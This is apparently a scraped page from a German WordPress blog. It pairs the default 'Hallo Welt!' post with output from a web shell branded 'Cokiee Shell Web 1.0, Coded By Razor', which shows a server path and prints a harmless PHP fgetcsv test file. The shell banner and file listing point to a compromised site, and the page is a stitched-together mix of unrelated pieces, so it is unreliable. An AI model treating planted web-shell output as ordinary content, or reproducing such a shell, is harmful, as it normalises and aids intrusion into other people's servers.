Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/standard/tests/file/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/standard/tests/file/bug40501.phpt |
--TEST-- Bug #40501 (fgetcsv() can't handle trailing odd number of backslashes) --FILE-- <?php $file = dirname(__FILE__).'/bug40501.csv'; $h = fopen($file, 'r'); $data = fgetcsv($h, NULL, ',', '"', '"'); fclose($h); var_dump($data); ?> --EXPECTF-- array(2) { [0]=> string(%d) "this element contains the delimiter, and ends with an odd number of backslashes (ex: 1)\" [1]=> string(%d) "and it isn't the last element$" }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare